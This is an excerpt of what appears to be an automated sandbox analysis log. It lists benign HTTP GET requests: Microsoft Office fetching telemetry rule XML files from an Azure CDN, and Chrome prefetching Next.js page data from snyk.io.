Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/integrations.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/plans.json?slug=plans HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/code-checker.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/application-security.json?slug=solutions&slug=application-security HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/secure-ai-generated-code.json?slug=solutions&slug=secure-ai-generated-code HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/software-supply-chain-security.json?slug=solutions&slug=software-supply-chain-security HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform.json?slug=platform HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/government-security-solution.json?slug=government-security-solution HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/lp/securing-ai-generated-code.json?slug=securing-ai-generated-code HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/resource-library.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/integrations.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customer-resources.json?slug=customer-resources HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/series/ethical-hacking.json?slug=ethical-hacking HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/zero-day-vulnerability-security.json?slug=solutions&slug=zero-day-vulnerability-security HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/deepcode-ai.json?slug=platform&slug=deepcode-ai HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/security-leaders.json?slug=security-leaders HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-top-10.json?slug=snyk-top-10 HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/podcasts/the-secure-developer.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/code-checker.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/lp/securing-ai-generated-code.json?slug=securing-ai-generated-code HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/resource-library.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/events.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-ambassadors.json?slug=snyk-ambassadors HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/government-security-solution.json?slug=government-security-solution HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog/snyk-snowflake-data-share.json?slug=snyk-snowflake-data-share HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/about.json?slug=about HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/services.json?slug=services HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/security-intelligence.json?slug=platform&slug=security-intelligence HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customers.json?slug=customers HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/partners.json?slug=partners HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customer-resources.json?slug=customer-resources HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/case-studies.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/news.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/series/ethical-hacking.json?slug=ethical-hacking HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
